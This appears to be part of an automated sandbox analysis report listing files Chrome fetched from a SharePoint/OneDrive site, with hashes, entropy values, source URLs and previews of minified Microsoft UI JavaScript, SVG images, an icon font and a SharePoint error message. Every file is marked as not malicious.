                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1664],{3926:function(e,t,n){n.r(t),n.d(t,{ShowPropertiesAction:function(){return y}});var a=n("tslib_102"),i=n(2465),r=n(2592),o=n(2648),s=n(2863),c=n(20),d=n(2473),l=n(2496),u=n(197),f=n(399),p=n(2464),m=n(10),_=n(107),h=n(294),b=n(2943),g=n(1151),v=n(83),y=function(e){function t(t,n){void 0===t&&(t={}),void 0===n&&(n={});var a=e.call(this,t,n)||this;a.name="ShowProperties";var i=n.isInfoPaneExpanded,c=void 0===i?a.resources.consume(r.resourceKey):i,m=n.isSharingSectionExpanded,_=void 0===m?a.resources.consume(u.v.optional):m,h=n.isInfoPaneAvailable,b=void 0===h?a.resources.consume(l.a.infoPane.isInfoPaneAvailable.optional):h,g=n.isFiltersPaneExpanded,v=void 0===g?a.resources.consume(o.a):g,y=n.isCopilotPaneExpanded,S=void 0===y?a.resources.consume(s.a):y,D=n.isColumnCustomizationPaneExpanded,I=void 0===D?a.resources.consume(l.a.columnCustomizationPane.isColumnCustomizationPaneExpanded.optional):D,x=n.rumOne
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):1253220
                                                  Entropy (8bit):5.299369215686719
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:DEBC8EAC71727871BE6CF608CC6065EE
                                                  SHA1:625D4121456476BDC2144562D3C4E18229CCBC45
                                                  SHA-256:1A3775066637EA3F368764708A42A02FFBEE418758EB6B52BF02F69AF052D12D
                                                  SHA-512:4AC645B516DFBE361B95C2CB4D5D5D1DF8FD7BDA80CF9F98115FFF042DAAA57D2BA61C8F0BCB65E0EE9230E277A249F08A7A6662397DCF35859E017B287FD1FC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://hidrotehnik-my.sharepoint.com/_layouts/15/SPComponentRegistry.ashx?projects=[%22spfx%22]&languages=%5B%5D
                                                  Preview:{"spfx":[{"id":"15882270-4250-46c0-8abc-79e58220d84e","alias":"EduCoursesACE","componentType":"AdaptiveCardExtension","version":"1.0.0","manifestVersion":2,"requiresCustomScript":false,"supportedHosts":["Dashboard"],"supportsThemeVariants":true,"preconfiguredEntries":[{"groupId":"bd067b1e-3ad5-4d5d-a5fe-505f07d7f59c","group":{"default":"Dashboard"},"title":{"default":"Courses","en-US":"Courses"},"description":{"default":"Displays courses student is enrolled in through Microsoft Teams. ","en-US":"Displays courses student is enrolled in through Microsoft Teams. "},"officeFabricIconFontName":"PublishCourse","properties":{"title":"Courses","imageUrl":""}}],"loaderConfig":{"internalModuleBaseUrls":["https://res-1.cdn.office.net:443/files/sp-client/","https://res-2.cdn.office.net:443/files/sp-client/"],"entryModuleId":"edu-courses-adaptive-card-extension","scriptResources":{"edu-courses-adaptive-card-extension":{"type":"louserzedPath","paths":{"default":{"path":"edu-courses-adaptive-card-ext
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (10555)
                                                  Category:downloaded
                                                  Size (bytes):29829
                                                  Entropy (8bit):5.554859693498248
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:72417A7AFCCBF4350577686A4D69546F
                                                  SHA1:8472865A1E2A9C01B73BE811237FD4A74E4B9E6D
                                                  SHA-256:A9FA9CE5D69571D73FAB5F520675739C0BB2F480811F2FFCF0C0839930E8DE2F
                                                  SHA-512:1D3597BDEF97C5DC9603357EAF9142774E5F36E7C8052090B33F454D4AC28907B45ECC76B8DC7B00B8CC6ECF54A5D6D87E634508C689F22CD42E29FF9DC5458D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/46836.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[46836],{411639:(e,t,n)=>{n.d(t,{Jjd:()=>r,XXG:()=>i,jKG:()=>s,wIl:()=>o});var a=n(875427);const i=(0,a.k)("Speaker020Regular","20",["M12 3a1 1 0 0 0-1.68-.73l-3.88 3.6A.5.5 0 0 1 6.1 6H3.5C2.67 6 2 6.67 2 7.5v5c0 .83.67 1.5 1.5 1.5h2.6a.5.5 0 0 1 .34.13l3.88 3.6a1 1 0 0 0 1.68-.74V3.01ZM7.12 6.6 11 3v14l-3.88-3.6A1.5 1.5 0 0 0 6.1 13H3.5a.5.5 0 0 1-.5-.5v-5c0-.28.22-.5.5-.5h2.6c.38 0 .75-.14 1.02-.4Z"]),r=(0,a.k)("Speaker120Regular","20",["M12 3a1 1 0 0 0-1.68-.73l-3.88 3.6A.5.5 0 0 1 6.1 6H3.5C2.67 6 2 6.67 2 7.5v5c0 .83.67 1.5 1.5 1.5h2.6a.5.5 0 0 1 .34.13l3.88 3.6a1 1 0 0 0 1.68-.74V3.01ZM7.12 6.6 11 3v14l-3.88-3.6A1.5 1.5 0 0 0 6.1 13H3.5a.5.5 0 0 1-.5-.5v-5c0-.28.22-.5.5-.5h2.6c.38 0 .75-.14 1.02-.4Zm6.96 6.33a.5.5 0 0 1-.18-.68 4.5 4.5 0 0 0 0-4.5.5.5 0 1 1 .86-.5 5.5 5.5 0 0 1 0 5.5.5.5 0 0 1-.68.18Z"]),o=(0,a.k)("Speaker220Regular","20",["M12 3a1 1 0 0 0-1.68-.73l-3.88 3.6A.5.5 0 0 1
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (2283)
                                                  Category:downloaded
                                                  Size (bytes):6068
                                                  Entropy (8bit):5.552864173042703
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:507A8F110363145988BB7A0D38A497C2
                                                  SHA1:94275A56526CE8833717D11D9B9152F26994EE22
                                                  SHA-256:87A115986B126F4E98CB04211542F5E1C4DDE83586C6E1D1199D098F3D56CCE8
                                                  SHA-512:1D8C6DFD8E887F24809221D74C4C207CC0AB7035968942658147147F9CE20EEE7556DFAFB82406FD6AF24D1BDCF2F5AC792E85B32191F0A7A63840F2592AC3C2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/uiManager.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[29735],{669333:(e,t,n)=>{n.d(t,{W:()=>r});var a=/[\{\}]/g,i=/\{\d+\}/g;function r(e){for(var t=[],n=1;n<arguments.length;n++)t[n-1]=arguments[n];var r=t;function o(e){var t=r[e.replace(a,"")];return null==t&&(t=""),t}return e.replace(i,o)}}.,705760:(e,t,n)=>{n.d(t,{p:()=>m});var a,i,r=n(295610),o=n(966034),s=n(849968),c=n(495122),d=n(375865),l=n(887602),u=n(188830),f=((a={})[o.I.primaryColor]="#BC1948",a),p=((i={})[o.I.primaryColor]="#E8467C",i[o.I.foregroundColor]="#F3F2F1",i[o.I.backgroundColor]="#1B1A19",i),m=function(e,t){if(void 0===t&&(t={}),t.fluentTheme)return _(t.fluentTheme,t.disableLoadTheme);var n=t.base&&t.base.isStandardTheme,a=n?f:p,i=(0,r.__assign)({},a);["primaryColor","backgroundColor","foregroundColor"].forEach(function(n){var a=t.base&&t.base[n],r=n;if(a){var c=!1;if((0,s.r)(a))c=!0,i[o.I[r]]=a;else{var d="#".concat(a);(0,s.r)(d)&&(c=!0,i[o.I[r]]=d)}c||null==e||e.warn("Co
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (57084)
                                                  Category:downloaded
                                                  Size (bytes):62456
                                                  Entropy (8bit):4.835792491262597
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:834A822CA8F28275805AB85EB9E2129A
                                                  SHA1:24D0D399741EBAF1AA28BBE8071CC33C554DA8C3
                                                  SHA-256:AB2094C2BDB62098F94A2203DCCA2D8187FE87C23867E4897F830E601C0150FA
                                                  SHA-512:705B6FD8E4D33A9B2AE5B450023E96B276B8B69FC8094AF66FF6C8B501E9E8758FB074096B0AA1E18C75B053AC877355181299E49E8D7F0C2A4BE5C0C8EA3C79
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/stsserviceworkerprefetch/stsserviceworkerprefetch.js
                                                  Preview:.if (typeof self !== 'undefined') {. const versionedPaths = ["@ms/stream-bundle/chunks/14096.js","@ms/stream-bundle/chunks/14389.js","@ms/stream-bundle/chunks/14727.js","@ms/stream-bundle/chunks/16632.js","@ms/stream-bundle/chunks/17840.js","@ms/stream-bundle/chunks/22663.js","@ms/stream-bundle/chunks/26396.js","@ms/stream-bundle/chunks/28580.js","@ms/stream-bundle/chunks/29386.js","@ms/stream-bundle/chunks/31544.js","@ms/stream-bundle/chunks/33693.js","@ms/stream-bundle/chunks/34876.js","@ms/stream-bundle/chunks/35998.js","@ms/stream-bundle/chunks/36074.js","@ms/stream-bundle/chunks/37323.js","@ms/stream-bundle/chunks/37636.js","@ms/stream-bundle/chunks/38661.js","@ms/stream-bundle/chunks/43044.js","@ms/stream-bundle/chunks/44814.js","@ms/stream-bundle/chunks/46836.js","@ms/stream-bundle/chunks/47069.js","@ms/stream-bundle/chunks/51542.js","@ms/stream-bundle/chunks/58148.js","@ms/stream-bundle/chunks/61782.js","@ms/stream-bundle/chunks/68691.js","@ms/stream-bundle/chunks/70906.js","@
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:XML 1.0 document, ASCII text, with very long lines (443), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):443
                                                  Entropy (8bit):4.920679566192411
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:E0A40795A3DCFC0FF6E3060AE42B4139
                                                  SHA1:103AA9D566CE73524F15E89C792BFE2E59EB6512
                                                  SHA-256:84DFB688C8655E3A75E462F66F5A316E29F5DE5AE8D785822F8E4F9BFB6B79F5
                                                  SHA-512:C8A8BC4317E8BEA6513F0C33AD94D97E2D60BE9DAB1EA2FDE301B1007E7D866C39D9FACAC4EC2A3CFFF7CF7FC4F3E49C52B39BCE42E673F7F94D853B051667CE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<?xml version="1.0" encoding="utf-8"?><m:error xmlns:m="http://schemas.microsoft.com/ado/2007/08/dataservices/metadata"><m:code>-1, Microsoft.SharePoint.Client.ClientServiceException</m:code><m:message xml:lang="en-US">The HTTP method 'GET' cannot be used to access the resource 'RenderListDataAsStream'. The operation type of the resource is specified as 'Default'. Please use correct HTTP method to invoke the resource.</m:message></m:error>
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (7896)
                                                  Category:dropped
                                                  Size (bytes):10301
                                                  Entropy (8bit):5.368596325095115
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:8360EBAFF258E7803C5FED42D0DD8A21
                                                  SHA1:CB751723AAF0227AFE5495CE339D69EDE9ED6FDF
                                                  SHA-256:5516F012867444905C9DE5CCADB64763AA41F5E6855DDCB460522721290A19F6
                                                  SHA-512:EA82CDB61B04066B82F8DDAD5A4EC83EDF20B9BE0C08DAA1C558FF1C49744D58F6B06CA88480F59AA33CD1E1DDC342296B93F4D79ADC8BEBCDB3AEFCBDBE70B5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[35],{8413:function(e,t,n){n.d(t,{a:function(){return L},b:function(){return D},c:function(){return A}});var a=n("tslib_102"),i=n(12),r=n(13),o=n(598),s=n(76),c=n(619),d=n(10),l=n(407),u=n("odsp.util_460"),f=n(5911),p=n(544),m=n(35),_=n(98),h=n(374),b=n(1938),g=n(1939),v=n(8414),y=n(8415),S=n(1204),D=u.HW.isActivated("03602390-d293-4f7e-bfaa-9e0a0c0ef730"),I=u.HW.isActivated("b2bdd32b-7546-476c-be48-4d07dc4ae32c"),x=u.HW.isActivated("6ee65b7d-df17-4fd7-830c-0dbab64b254a"),C="cmdbar-itm-click",O="command-bar-menu-id",w=(0,f.a)("commandbarsubmenus=0"),E=(0,p.b)({loader:function(){return(0,a.Zd)(void 0,void 0,void 0,function(){return(0,a.qr)(this,function(e){switch(e.label){case 0:return[4,n.e(388).then(n.bind(n,2137))];case 1:return[2,e.sent().ContextualMenu]}})})}});function A(e){var t=this,u=e.classes,f=void 0===u?{}:u,p=e.commandSetProvider,A=e.QosEvent,L=void 0===A?d.a:A,M=e.onOpenContextMenu,P=e.experimenta
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:downloaded
                                                  Size (bytes):3106
                                                  Entropy (8bit):4.5960119219646725
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:28271601DFEC8047BB170A479B0EF249
                                                  SHA1:0D0090CF895002EB0FA5F48B1252F31105C0D363
                                                  SHA-256:6FB35BAC67A53E799212124F8364C90F751316040A2C44EDBEA7D52B9F057DE4
                                                  SHA-512:7A630777009CBECADDE82188B0DC174BEF151F067BEB4F20762FA00FF51E02AE8556704B4A1078188B01DEF7444B30DF407F8346207B114D012B8EFFCFCA57F8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/emptyfolder/empty_result_dark.svg
                                                  Preview:<svg width="160" height="160" viewBox="0 0 160 160" fill="none" xmlns="http://www.w3.org/2000/svg">..<path d="M27.4 44.8C37.0098 44.8 44.8 37.0098 44.8 27.4C44.8 17.7902 37.0098 10 27.4 10C17.7902 10 10 17.7902 10 27.4C10 37.0098 17.7902 44.8 27.4 44.8Z" fill="#33312D"/>..<path d="M64.3004 98.8C83.8513 98.8 99.7004 82.9509 99.7004 63.4C99.7004 43.8491 83.8513 28 64.3004 28C44.7495 28 28.9004 43.8491 28.9004 63.4C28.9004 82.9509 44.7495 98.8 64.3004 98.8Z" fill="#797673"/>..<path d="M29.5996 53C31.7996 54.1 34.3996 54.7001 36.9996 54.7001C46.5996 54.7001 54.3996 46.9 54.3996 37.3C54.3996 34.6 53.7996 32 52.6996 29.8C41.6996 33.2 32.9996 41.9 29.5996 53Z" fill="#605D5A"/>..<path d="M102.1 40.7C89.2003 19.4 61.6003 12.6 40.3003 25.5C19.0003 38.4 12.2003 66 25.0003 87.3C37.9003 108.6 65.6003 115.4 86.8003 102.5C108.2 89.7 115 62 102.1 40.7ZM80.0003 91.2C65.0003 100.3 45.5003 95.4 36.4003 80.5C32.1003 73.4 30.9003 65.3 32.5003 57.8C34.1003 49.4 39.2003 41.7 47.1003 36.9C62.1003 27.8 81.6003
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:downloaded
                                                  Size (bytes):23079
                                                  Entropy (8bit):4.432934939593491
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:75B8157A5F177E510FF6576EBD12D5AF
                                                  SHA1:5B510F99DC9737E06EF3634EDABC83CC74AD1BC2
                                                  SHA-256:D0688F2F7BD9653049F9AAA77A5E143E3A75C3A9E09134F6A134DA2FAC9A77CE
                                                  SHA-512:F91AB0FB913A4E912D2891FB45388330D1094346CDD7F3DE7F8C58A82645409C462016C5E6792886DAEF6D6CC542F4743A1EBF93360989F49DB5D8FA166F60BF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/emptyfolder/empty_recent_v2_dark.svg
                                                  Preview:<svg id="GRAPHICS" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="208" height="208" viewBox="0 0 208 208"><defs><radialGradient id="radial-gradient" cx="2388.356" cy="120.437" fx="2396.5457577691936" r="8.378" gradientTransform="matrix(0.99, 0.02, -0.02, 1, -2216.113, -48.357)" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#e1dfdd"/><stop offset="0.335" stop-color="#e1dfdd"/><stop offset="0.61" stop-color="#c6c4c2"/><stop offset="1" stop-color="#e1dfdd"/></radialGradient><radialGradient id="radial-gradient-3" cx="779.925" cy="84.048" r="28.576" gradientTransform="matrix(0.995, -0.104, 0.105, 1.003, -717.608, 143.499)" gradientUnits="userSpaceOnUse"><stop offset="0.338" stop-color="#797673"/><stop offset="0.513" stop-color="#979592"/><stop offset="0.701" stop-color="#b1afac"/><stop offset="0.869" stop-color="#c1bebc"/><stop offset="1" stop-color="#c6c4c2"/></radialGradient></defs><path d="M92.607,174.022c-47.885,39.353-121.684.073-75.3
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (7232)
                                                  Category:dropped
                                                  Size (bytes):37942
                                                  Entropy (8bit):5.463762034178193
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:1EFF4E39A995FDE3FA357E655C979CE6
                                                  SHA1:D8E6CB0490FBA15A524340770FBAA9689BE5DC5D
                                                  SHA-256:19022EDB509E8E787A7A3377892CB422286F37709807A69F71453396405C6132
                                                  SHA-512:CFE9204B8E9356A55FE20BF2DE3BCAFF720E621A62E839DE746EC00DDCA70286643B8B82028C05990BA6935517380319F5069AF16ED2F1C5DE7A141925AC467E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[135],{3869:function(e,t,n){n.d(t,{a:function(){return i}});var a=n("fui.util_369"),i=(0,a.Ww)(function(e,t,n,i){return{root:(0,a.J4)("ms-ActivityItem",t,e.root,i&&e.isCompactRoot),pulsingBeacon:(0,a.J4)("ms-ActivityItem-pulsingBeacon",e.pulsingBeacon),personaContainer:(0,a.J4)("ms-ActivityItem-personaContainer",e.personaContainer,i&&e.isCompactPersonaContainer),activityPersona:(0,a.J4)("ms-ActivityItem-activityPersona",e.activityPersona,i&&e.isCompactPersona,!i&&n&&2===n.length&&e.doublePersona),activityTypeIcon:(0,a.J4)("ms-ActivityItem-activityTypeIcon",e.activityTypeIcon,i&&e.isCompactIcon),activityContent:(0,a.J4)("ms-ActivityItem-activityContent",e.activityContent,i&&e.isCompactContent),activityText:(0,a.J4)("ms-ActivityItem-activityText",e.activityText),commentText:(0,a.J4)("ms-ActivityItem-commentText",e.commentText),timeStamp:(0,a.J4)("ms-ActivityItem-timeStamp",e.timeStamp,i&&e.isCompactTimeStamp)}})
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (6090)
                                                  Category:downloaded
                                                  Size (bytes):47319
                                                  Entropy (8bit):5.367170586756239
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:05C81C7AC764BAC548E3D4A08CC3DFEB
                                                  SHA1:37EC249CD3C60D71C26EF994B599C0B082D43D9C
                                                  SHA-256:0CB491798D57B2E0A70B9B3D84671D90284163A3E2AFEF4BEFD0AE6B93D71D61
                                                  SHA-512:85457D3BEDA1410EDB7BFA955F5716F8BA7E3A00EB6B60192398DABD47524F23C4489175E06C79BF5E8CA66CE3E1DB2B3DB1519135D82DE020B68C6E90382CC4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/61782.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[61782],{265899:(e,t,n)=>{n.d(t,{t:()=>i});var a=n(17283);function i(e,t,n){void 0===n&&(n=!0);var i=!1;if(e&&t)if(n)if(e===t)i=!0;else for(i=!1;t;){var r=(0,a.G)(t);if(r===e){i=!0;break}t=r}else e.contains&&(i=e.contains(t));return i}}.,302109:(e,t,n)=>{n.d(t,{X:()=>i});var a=n(17283);function i(e,t,n){return null!=n||(n=document),e&&e!==n.body?t(e)?e:i((0,a.G)(e),t):null}}.,17283:(e,t,n)=>{n.d(t,{G:()=>i});var a=n(209128);function i(e,t){return void 0===t&&(t=!0),e&&(t&&function(e){var t;return e&&(0,a.r)(e)&&(t=e._virtual.parent),t}(e)||e.parentNode&&e.parentNode)}}.,209128:(e,t,n)=>{function a(e){return e&&!!e._virtual}n.d(t,{r:()=>a})}.,771690:(e,t,n)=>{n.d(t,{U:()=>i,Y:()=>a});var a="data-portal-element";function i(e){e.setAttribute(a,"true")}}.,929631:(e,t,n)=>{n.d(t,{r:()=>r});var a=n(496997),i=n(408156);function r(){var e=i.useRef();return e.current||(e.current=new a.e),i.useEffect(f
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Web Open Font Format, TrueType, length 16704, version 1.3277
                                                  Category:downloaded
                                                  Size (bytes):16704
                                                  Entropy (8bit):7.979989681644153
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5DB40868ABE1278EDFBE02461D4F3547
                                                  SHA1:ED9229E0C8F49E1CC8134E4E6D3822A4BB6A5DE9
                                                  SHA-256:98ACEAC979E7943CA3CD352501C73A7BA297D4DB87D7392E2945DB3CE29B33FE
                                                  SHA-512:D8267C31CBB0E23940BA78DD1E60B119A641DC46F11F472FD7DC2E5E708B0E38F4444FCFDBBEC7409064B78688F268DCDA2AE5005B8A568C81E59D41E676BBD1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-3-66aed320.woff
                                                  Preview:wOFF......A@......up........................OS/2.......G...`-.g.cmap...P............gasp...P............glyf...\..9...f<.s..head..;....5...6#.hhea..<(.......$....hmtx..<D...]........loca..<.............maxp..=p....... ....name..=........O..R.post..A,....... ....x.c`a..8...........L..t.!.I.(......@9......VP`pxz.'...!...X <....O....x....+.q.....Vz....M<^.B.kQ^.e.:+....r.*...c....o..Dje...\9....\>.!.Nj..9..N.r.w....5.(.Hn.4yV....Z.n..... .<.. B?<..c....$.PD..X."...U..V.....'..42uZKZ.-..}S...o..mu.*eY.y.......+..>.M.._..O...>.7......)?..%...a.f...|.Wm}.......O...$. ..............x..}.`.....Jk[.lY?[.eK.$..,.vlKNb'...'..|I @ ..B6..BJ..i..6.....RR>.LK......\J..-....^...mi.......9.....s.....<D.t.a...L..x-...+...R.'...o3.s.1.F./.....".D.....!....6.....@.9..3.x.F.@.......}F9L.^..TF..ZH...m.49.|.....qR.....A>N.N.B&D.TYr....>}p..Oo..tm=.`.-..[.-......*"M...[.K.E.:..u..m.v......u..~v............~x..t.0o...R-j..$g.[....k..[7.........N._P`.....|A..
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (4621)
                                                  Category:dropped
                                                  Size (bytes):10149
                                                  Entropy (8bit):5.195383022540428
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:66E6A0272C97493C8789878D93A726D3
                                                  SHA1:88463FB0C3D06633E3A0E59C3725858257760AF9
                                                  SHA-256:4D6566067C94975DA2170884B51036495D3F97228B5A84EA0C6B01EC31921F68
                                                  SHA-512:3AA9F4D0810838E65356FDD3D465EA31CC33C639830F301C5A9CA9DD360A62DE3304CAFDB05ED76A5A9EA81D3983FD167017EAA7B0BB2DE155209714AA95E051
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[120],{3628:function(e,t,n){n.d(t,{a:function(){return s}});var a=n("tslib_102"),i=n("react-lib"),r=n(467),o=n(1489),s=function(e){return i.createElement(r.a,(0,a.W_)({},e),i.createElement(o.a,(0,a.W_)({disabled:e.hidden},e.focusTrapProps),e.children))}}.,4980:function(e,t,n){n.d(t,{a:function(){return d}});var a=n("tslib_102"),i=n("react-lib"),r=n(47),o=n(152),s=n(3628),c=n(467),d=function(e){var t=e.gapSpace,n=void 0===t?0:t,d=e.directionalHint,l=void 0===d?o.a.bottomLeftEdge:d,u=e.directionalHintFixed,f=e.targetElement,p=e.firstFocus,m=e.trapFocus,_=e.onLeave,h=e.className,b=e.finalHeight,g=e.content,v=e.calloutProps,y=(0,a.W_)((0,a.W_)((0,a.W_)({},(0,r.h)(e,r.f)),{className:h,target:f,isBeakVisible:!1,directionalHint:l,directionalHintFixed:u,finalHeight:b,minPagePadding:24,onDismiss:_,gapSpace:n}),v);return i.createElement(i.Fragment,null,m?i.createElement(s.a,(0,a.W_)({},y,{focusTrapProps:{forceFocusInsid
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (5720)
                                                  Category:downloaded
                                                  Size (bytes):11052
                                                  Entropy (8bit):5.542016721585095
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:7FE50AE9C636ECB842B746A351D90E19
                                                  SHA1:F4CB2519C516271EED04CD2ACA37AAC857C454D1
                                                  SHA-256:FE40E6BD98F8879C52E00342AACB564C4FC05D221E1B2881FDBA123117DEA1E0
                                                  SHA-512:332F401801226D07585D9670AFAC00FC6FF51649DC9CE19AD20D7C9536823017BC947F2460DF86D539C385DCDD4123EB2B5FB70B2FA58D71AC4FCF7E76EF572B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/68691.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[68691],{280217:(e,t,n)=>{n.d(t,{o:()=>m});var a=n(408156),i=n(142866),r=n(653350),o=n(320344),s=n(131077),c=n(184717),d=n(755289),l=n(989714),u=n(37318),f=n(132963),p=n(527872);const m=a.forwardRef((e,t)=>{const n=((e,t)=>{const n=(0,c.Ab)(e=>e.contentRef),a=(0,c.Ab)(e=>e.openOnHover),d=(0,c.Ab)(e=>e.setOpen),l=(0,c.Ab)(e=>e.mountNode),u=(0,c.Ab)(e=>e.arrowRef),f=(0,c.Ab)(e=>e.size),p=(0,c.Ab)(e=>e.withArrow),m=(0,c.Ab)(e=>e.appearance),_=(0,c.Ab)(e=>e.trapFocus),h=(0,c.Ab)(e=>e.inertTrapFocus),b=(0,c.Ab)(e=>e.inline),{modalAttributes:g}=(0,s.e)({trapFocus:_,legacyTrapFocus:!h,alwaysFocusable:!_}),v={inline:b,appearance:m,withArrow:p,size:f,arrowRef:u,mountNode:l,components:{root:"div"},root:i.wx((0,r.h)("div",{ref:(0,o.r)(t,n),role:_?"dialog":"group","aria-modal":!!_||void 0,...g,...e}),{elementType:"div"})},{onMouseEnter:y,onMouseLeave:S,onKeyDown:D}=v.root;return v.root.onMouseEnter=e=>{a
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (11014)
                                                  Category:downloaded
                                                  Size (bytes):31683
                                                  Entropy (8bit):5.477299600708562
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4BA24755BFF6C8E902279373A2957766
                                                  SHA1:F85D88EC204762161DDD6B60C53C271FEE38163F
                                                  SHA-256:065C93B7CFD1C622B4C64D9E9D6409157BF017BAE45EA9EC248DDCD34C6072C3
                                                  SHA-512:B54B8D9EFFC66C4F4EA18EF022D11132F24F604946F881D3E4CE572FC1F4015A9BC8328CA84EC71F9D4D5EE8941B3DC2D1BC0FFACB46F50FA12614311254D635
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/87602.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[87602],{737969:(e,t,n)=>{n.d(t,{l:()=>i});var a=n(354483);function i(e){for(var t=[],n=1;n<arguments.length;n++)t[n-1]=arguments[n];for(var i=[],r=0,o=t;r<o.length;r++){var s=o[r];s&&i.push("function"==typeof s?s(e):s)}return 1===i.length?i[0]:i.length?a.m.apply(void 0,i):{}}}.,349537:(e,t,n)=>{n.d(t,{j:()=>o});var a=n(707043),i=n(614231),r=n(333039);function o(e){var t=i.Y.getInstance(),n=(0,r.aH)((0,a.Lo)(),e);if(!t.classNameFromKey(n)){var o=t.getClassName();t.insertRule("@font-face{".concat(n,"}"),!0),t.cacheClassName(o,n,[],["font-face",n])}}}.,821524:(e,t,n)=>{n.d(t,{F:()=>o});var a=n(707043),i=n(614231),r=n(333039);function o(e){var t=i.Y.getInstance(),n=[];for(var o in e)e.hasOwnProperty(o)&&n.push(o,"{",(0,r.aH)((0,a.Lo)(),e[o]),"}");var s=n.join(""),c=t.classNameFromKey(s);if(c)return c;var d=t.getClassName();return t.insertRule("@keyframes ".concat(d,"{").concat(s,"}"),!0),t.cache
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (26634)
                                                  Category:downloaded
                                                  Size (bytes):43994
                                                  Entropy (8bit):5.156365426740959
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:BB638665C84DB2D1460C4A7D976EC1D2
                                                  SHA1:71DE6285487D2DD9F5909F4CEFCE2D8321462BB6
                                                  SHA-256:935DBC7736CC064A7753C1AE2B5FBC761A5042CF1BC64CF8ECD22601907BE9B0
                                                  SHA-512:8BA1D086623D6B57C10F04D2763526411A22BF310ED2CA77563C221D6883A115AFD72EDD365C70A90AC4A91C656E5595ACDB05D49071DA9E6A33C69F7FBC480D
                                                  Malicious:false
                                                  Reputation:unknown
